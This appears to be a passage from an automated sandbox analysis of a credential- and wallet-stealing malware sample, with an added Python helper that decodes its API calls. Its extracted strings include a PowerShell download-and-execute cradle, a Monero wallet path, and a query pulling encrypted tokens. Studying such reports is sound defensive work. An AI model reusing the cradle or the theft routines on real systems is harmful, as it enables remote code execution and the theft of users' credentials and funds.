                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: ba0b3d4b15315b3a256f8af771502461b290580a26aefc56b349808273b21eb7
                      • Instruction ID: a69658d5e7fc934ba902e286066d002addf3282f1e11e0269215988a80411e70
                      • Opcode Fuzzy Hash: ba0b3d4b15315b3a256f8af771502461b290580a26aefc56b349808273b21eb7
                      • Instruction Fuzzy Hash: 1E51A0B1900218ABDB21DFA0DC46BEE77B9FB44301F10859AF605AB2C1DB746B85CF95
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      • lstrlen.KERNEL32(00000000), ref: 003DBC9F
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 003DBCCD
                      • lstrlen.KERNEL32(00000000), ref: 003DBDA5
                      • lstrlen.KERNEL32(00000000), ref: 003DBDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: 249958958f733981018644a561cb04951b384ba50a4cfcfa8aec8e3927b211f5
                      • Instruction ID: 8c6634b95f292222d5fa7721b9c0003ac3f84fb4d605388eb1253cf0d5f09166
                      • Opcode Fuzzy Hash: 249958958f733981018644a561cb04951b384ba50a4cfcfa8aec8e3927b211f5
                      • Instruction Fuzzy Hash: 51B197729106589BDB06FBA1DC92EEE7739AF14300F414219F5066B1D2EF347E49CBA2
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 7d788fc7e587837ef11fc63b61e74c587701137b446eca33176492c14da14941
                      • Instruction ID: 765694d62dca1c0dde6951fe7381385e598f246b950c13033da69ba7414f9071
                      • Opcode Fuzzy Hash: 7d788fc7e587837ef11fc63b61e74c587701137b446eca33176492c14da14941
                      • Instruction Fuzzy Hash: 4CF0E234905208EFD3419FE0E80A7AC7B71FB05713F08829EF609862C0D6304B41CB92
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003D4FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D4FD1
                      • InternetOpenA.WININET(003F0DDF,00000000,00000000,00000000,00000000), ref: 003D4FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003D5011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 003D5041
                      • InternetCloseHandle.WININET(?), ref: 003D50B9
                      • InternetCloseHandle.WININET(?), ref: 003D50C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: 37ac9142c8510f8c0b0105a8ae024d0b8d0f5fa23598acb1d82e02b527bdd346
                      • Instruction ID: ee10d5dab5c79bd7a3697de18ccd424922aa77acc1a1a265f505b4a6e54ad919
                      • Opcode Fuzzy Hash: 37ac9142c8510f8c0b0105a8ae024d0b8d0f5fa23598acb1d82e02b527bdd346
                      • Instruction Fuzzy Hash: 8E31F5B5A01218ABDB20CF94DC85BDDB7B9EB48704F1081D9FB09A7281D7706AC58F99
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003E8426
                      • wsprintfA.USER32 ref: 003E8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003E847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E8499
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      • RegQueryValueExA.ADVAPI32(00000000,0108E0A0,00000000,000F003F,?,00000400), ref: 003E84EC
                      • lstrlen.KERNEL32(?), ref: 003E8501
                      • RegQueryValueExA.ADVAPI32(00000000,0108DF98,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003F0B34), ref: 003E8599
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E8608
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: aa2671e4262292edc53b04227171982190268e082adf149a3b801034b78dd8cf
                      • Instruction ID: d93400b017827393643bf60b4f2e8f3f0570213069e0f250a42ea75c6ab4a59b
                      • Opcode Fuzzy Hash: aa2671e4262292edc53b04227171982190268e082adf149a3b801034b78dd8cf
                      • Instruction Fuzzy Hash: 9C210A7191022C9BDB64DF94DC85FE9B7B9FB48700F04C299E60996180DF716A85CFD4
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E76A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E76AB
                      • RegOpenKeyExA.ADVAPI32(80000002,0107C578,00000000,00020119,00000000), ref: 003E76DD
                      • RegQueryValueExA.ADVAPI32(00000000,0108E0B8,00000000,00000000,?,000000FF), ref: 003E76FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E7708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: b7872a5d006525d6840d41dd9f110dfcde5cffd5b485540952ae51cfcbc4855e
                      • Instruction ID: d9896b1f1c341e31355854e776e4493269da82e4a8830ade117ad37cf3486d98
                      • Opcode Fuzzy Hash: b7872a5d006525d6840d41dd9f110dfcde5cffd5b485540952ae51cfcbc4855e
                      • Instruction Fuzzy Hash: 2F018FB9A00208BBD701DBE5DD49FBAB7B9EB08700F008156FA04D72D1E6709A008B51
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E773B
                      • RegOpenKeyExA.ADVAPI32(80000002,0107C578,00000000,00020119,003E76B9), ref: 003E775B
                      • RegQueryValueExA.ADVAPI32(003E76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003E777A
                      • RegCloseKey.ADVAPI32(003E76B9), ref: 003E7784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 50492ad48e5f8c8ef49028daecd26a6f12ccda8b296703665849ad4f8bc21f12
                      • Instruction ID: 0f70e919b39f428da1069ff400ee3cf38a6bc741c60f1e9278a23b2202189c96
                      • Opcode Fuzzy Hash: 50492ad48e5f8c8ef49028daecd26a6f12ccda8b296703665849ad4f8bc21f12
                      • Instruction Fuzzy Hash: 2801F4B9A40308FBDB01DBE4DC49FFEB7B9EB44701F148555FA05A7281DA705A008B51
                      APIs
                      • CreateFileA.KERNEL32(:>,80000000,00000003,00000000,00000003,00000080,00000000,?,003E3AEE,?), ref: 003E92FC
                      • GetFileSizeEx.KERNEL32(000000FF,:>), ref: 003E9319
                      • CloseHandle.KERNEL32(000000FF), ref: 003E9327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :>$:>
                      • API String ID: 1378416451-2938857274
                      • Opcode ID: 23674ae9423d9cfb1bb3897978f20e66c1048ab48a065da749ae3ce237690e63
                      • Instruction ID: 970f1399a3b8762aace34ceb8b57dd6abe8502d71f379d0476522e9379503330
                      • Opcode Fuzzy Hash: 23674ae9423d9cfb1bb3897978f20e66c1048ab48a065da749ae3ce237690e63
                      • Instruction Fuzzy Hash: 49F04439E40204FBDB11DFF1DC45F9E77B9AB48710F15C255B951A71C0D67097018B40
                      APIs
                      • memset.MSVCRT ref: 003E40D5
                      • RegOpenKeyExA.ADVAPI32(80000001,0108D620,00000000,00020119,?), ref: 003E40F4
                      • RegQueryValueExA.ADVAPI32(?,0108E1A8,00000000,00000000,00000000,000000FF), ref: 003E4118
                      • RegCloseKey.ADVAPI32(?), ref: 003E4122
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4147
                      • lstrcat.KERNEL32(?,0108E208), ref: 003E415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      • Opcode ID: 3aba493f823e96db059aaa86af0cbe3e04eb146b71d8803ab63fa8008dce7998
                      • Instruction ID: d210e8319660ab00534eff7514c9f0a35aa8d29e1ec3590428eef92024a8e2be
                      • Opcode Fuzzy Hash: 3aba493f823e96db059aaa86af0cbe3e04eb146b71d8803ab63fa8008dce7998
                      • Instruction Fuzzy Hash: 134178B7D001086BDB15EBE0EC46FFE737EAB88300F448659B6155B1C1EA755B888B92
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                      • LocalFree.KERNEL32(003D148F), ref: 003D9A90
                      • CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 1a00f7fb8ab58d710881978546cf6310ec2196c682bab6c52ecbf4d9b0ab2591
                      • Instruction ID: 5a03ce9dbf8e91a287869617ca5d353bd75e418ba8cdab558592e94933488404
                      • Opcode Fuzzy Hash: 1a00f7fb8ab58d710881978546cf6310ec2196c682bab6c52ecbf4d9b0ab2591
                      • Instruction Fuzzy Hash: 48314BB5A00209EFDB15CFA4D985BEE77B9FF48310F10815AE901A7390D774AA41CFA1
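The `APIs` lists in the records above carry the real information in this section, but the arguments are raw stack dwords and easy to misread. The helper below is an added example written for this report, not Joe Sandbox code: it parses the `Func.MODULE(args), ref: ADDR` lines (including the no-argument `wsprintfA.USER32 ref:` form and the indented `Part of subcall function` entries) and decodes the constants a triager wants resolved. Applied to the records above: `RegOpenKeyExA(80000002, ..., 00020119)` is HKEY_LOCAL_MACHINE opened with KEY_READ | KEY_WOW64_64KEY, the 64-bit registry view, under which the sibling function reads `CurrentBuildNumber`; `InternetOpenUrlA` with dwFlags `04000100` is INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE, so the body pulled in 0x400-byte `InternetReadFile` chunks leaves no WinINet cache entry to recover; `CreateFileA(..., 80000000, 00000003, ..., 00000003, ...)` is GENERIC_READ on an existing file with FILE_SHARE_READ | FILE_SHARE_WRITE, the share mode needed to read a file another process still holds open. Two caveats when reading these lines: `?` marks an argument the sandbox could not recover, and `GetProcessHeap` takes no arguments, so the two values printed for it are whatever sat on the stack at the call. That is consistent with the flags and size of the `RtlAllocateHeap` that follows (`05F5E0FF` is 99,999,999 bytes, `00000104` is 260, MAX_PATH), but it is an inference from the listing, not something the report states. The sample lines are copied from the API lists above; the behaviour labels returned by `summarize` are this example's own naming.

```python
# Added example for this report (not Joe Sandbox code): parse the 'APIs' lines of the
# function records and decode the Win32 constants in them. Handles the three line shapes
# seen on this page: Func.MODULE(args), ref: ADDR / Func.MODULE ref: ADDR / Part of subcall.
import re
from dataclasses import dataclass

API_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

# Win32 constants from the SDK headers, limited to the calls that occur in these records.
HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
REG_SAM = {0xF003F: "KEY_ALL_ACCESS", 0x20019: "KEY_READ", 0x20006: "KEY_WRITE",
           0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY"}
INET_FLAGS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x00800000: "INTERNET_FLAG_SECURE", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
FILE_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
FILE_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}

@dataclass(frozen=True)
class ApiCall:
    func: str
    module: str
    args: tuple          # int for a stack dword, str for a resolved string, None for '?'
    ref: int             # address of the call instruction in the dump
    subcall_of: object   # int for a 'Part of subcall function' entry, else None

def _arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None                                   # the sandbox could not recover it
    if len(tok) == 8 and all(c in "0123456789abcdefABCDEF" for c in tok):
        return int(tok, 16)                           # handle, flag, size or pointer
    return tok                                        # pointer resolved to a string

def parse_api_line(line):
    m = API_RE.match(line)
    if not m:
        return None
    raw, sub = m.group("args"), m.group("sub")
    args = tuple(_arg(t) for t in raw.split(",")) if raw else ()
    return ApiCall(m.group("func"), m.group("module").upper(), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)

def decode_flags(value, table):
    """Greedy bitmask decode, widest masks first, so KEY_READ (0x20019) is claimed
    before its component bits; bits no name covers are reported in hex, not guessed."""
    names, rest = [], value
    for mask, name in sorted(table.items(), key=lambda kv: -bin(kv[0]).count("1")):
        if (rest & mask) == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"

def describe(call):
    """Render the arguments that matter for triage; other calls pass through unchanged."""
    a = call.args
    dword = lambda i: a[i] if i < len(a) and isinstance(a[i], int) else None
    if call.func == "RegOpenKeyExA" and len(a) >= 4:       # (hKey, lpSubKey, ulOptions, samDesired, ...)
        return "RegOpenKeyExA(%s, ..., %s)" % (HIVES.get(dword(0), "hKey"),
                                              decode_flags(dword(3) or 0, REG_SAM))
    if call.func == "RegQueryValueExA" and len(a) > 1 and isinstance(a[1], str):
        return "RegQueryValueExA(value=%r)" % a[1]
    if call.func == "InternetOpenUrlA" and dword(4) is not None:   # 5th argument is dwFlags
        return "InternetOpenUrlA(flags=%s)" % decode_flags(dword(4), INET_FLAGS)
    if call.func == "InternetReadFile" and dword(2) is not None:   # 3rd argument is bytes to read
        return "InternetReadFile(chunk=%d bytes)" % dword(2)
    if call.func == "CreateFileA" and len(a) >= 6:         # (name, access, share, sa, disposition, ...)
        return "CreateFileA(access=%s, share=%s, disposition=%s)" % (
            decode_flags(dword(1) or 0, FILE_ACCESS), decode_flags(dword(2) or 0, FILE_SHARE),
            DISPOSITION.get(dword(4), hex(dword(4) or 0)))
    return "%s.%s" % (call.func, call.module)

def summarize(lines):
    """Roll one record's calls up into behaviour labels (this example's own naming)."""
    calls = [c for c in map(parse_api_line, lines) if c is not None]
    funcs = {c.func for c in calls}
    return {
        "parsed": len(calls),
        "wininet_download": {"InternetOpenUrlA", "InternetReadFile"} <= funcs,
        "hklm_read": any(c.func == "RegOpenKeyExA" and c.args and c.args[0] == 0x80000002
                         for c in calls),
        "queried_values": [c.args[1] for c in calls if c.func == "RegQueryValueExA"
                           and len(c.args) > 1 and isinstance(c.args[1], str)],
        "annotations": [describe(c) for c in calls],
    }

# Copied verbatim from the API lists above (records at 003D4FCA, 003E8426, 003E7734, 003E92FC).
SAMPLE = [
    "• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003D4FCA",
    "• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003D5011",
    "• InternetReadFile.WININET(?,?,00000400,00000000), ref: 003D5041",
    "• wsprintfA.USER32 ref: 003E8459",
    "• RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003E847B",
    "  • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6",
    "• RegOpenKeyExA.ADVAPI32(80000002,0107C578,00000000,00020119,003E76B9), ref: 003E775B",
    "• RegQueryValueExA.ADVAPI32(003E76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003E777A",
    "• CreateFileA.KERNEL32(:>,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003E92FC",
]
```

To apply it to another record, paste that record's `APIs` lines into `SAMPLE` and call `summarize`. The decode tables cover only the constants that occur on this page, and `decode_flags` reports any bit they do not name in hex rather than guessing; the labels in `summarize` are a triage aid read from static API references, not a detection rule, which should be built on the sandbox's network and registry event logs instead.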
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: the same 14 dump files listed under the first Memory Dump Source entry above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: String___crt$Typememset
                      • String ID:
                      • API String ID: 3530896902-3916222277
                      • Opcode ID: 26a7a40e04858f6d32b2f399cd1342553fe21e4fded067812f795cb431c03212
                      • Instruction ID: 968b3cfbd6ba474de7fd397cea65879531d9daa3e1ffca74db01647e299af126
                      • Opcode Fuzzy Hash: 26a7a40e04858f6d32b2f399cd1342553fe21e4fded067812f795cb431c03212
                      • Instruction Fuzzy Hash: 3A41F6711107AC9EDB228B258D84FFFBBEC9B45304F1455A8E98A861C3D3719A458F60
                      APIs
                      • lstrcat.KERNEL32(?,0108E388), ref: 003E47DB
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4801
                      • lstrcat.KERNEL32(?,?), ref: 003E4820
                      • lstrcat.KERNEL32(?,?), ref: 003E4834
                      • lstrcat.KERNEL32(?,0107B7C8), ref: 003E4847
                      • lstrcat.KERNEL32(?,?), ref: 003E485B
                      • lstrcat.KERNEL32(?,0108D680), ref: 003E486F
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003E8D90: GetFileAttributesA.KERNEL32(00000000,?,003D1B54,?,?,003F564C,?,?,003F0E1F), ref: 003E8D9F
                        • Part of subcall function 003E4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003E4580
                        • Part of subcall function 003E4570: RtlAllocateHeap.NTDLL(00000000), ref: 003E4587
                        • Part of subcall function 003E4570: wsprintfA.USER32 ref: 003E45A6
                        • Part of subcall function 003E4570: FindFirstFileA.KERNEL32(?,?), ref: 003E45BD
                       Memory Dump Source
                       • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                       • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: 3e7a0a6fb50285e18c34ecc7cb8d6a32bde897f1420a3dee4bb030f4c9fd7855
                      • Instruction ID: 1d86b69245760540b0c38aa5591b5c98ba14792a6299e60903967a0ee84e4996
                      • Opcode Fuzzy Hash: 3e7a0a6fb50285e18c34ecc7cb8d6a32bde897f1420a3dee4bb030f4c9fd7855
                      • Instruction Fuzzy Hash: 473184B6D0021867CB11FBF0DC85EE9737DAB48700F444689B3199A1C2EE74A78ACB91
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 003E2D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 003E2CC4
                      • ')", xrefs: 003E2CB3
                      • <, xrefs: 003E2D39
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 003E2D04
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: dceff95c51653dc734970c75195890f4ca8d87d83dbbb87d2244483f90153ce1
                      • Instruction ID: b0599a89e479818025b7491be6f3b6d8c93f7ba0aeb1d9ffa9fd347cb1b31ebf
                      • Opcode Fuzzy Hash: dceff95c51653dc734970c75195890f4ca8d87d83dbbb87d2244483f90153ce1
                      • Instruction Fuzzy Hash: 2141E271C006589ADB1AFBA1C891BEDBB79AF10300F414219F106AA1D2DF747A4ADF91
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 003D9F41
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Strings
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: 3a551bf44c460ae303a5472a580707f12f8ec0cbaae1f78b7af9a63987a722bd
                      • Instruction ID: 378054b5ed601596255ed98975e02f41b5d81c0c0ef4daadf1a0b65ce96c3705
                      • Opcode Fuzzy Hash: 3a551bf44c460ae303a5472a580707f12f8ec0cbaae1f78b7af9a63987a722bd
                      • Instruction Fuzzy Hash: 9F617E71A0024CEBDB25EFA4DD96FED7779AF40300F008118F90A5F285EB746A05CB52
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • memset.MSVCRT ref: 003E716A
                      Strings
                      • s>, xrefs: 003E7111
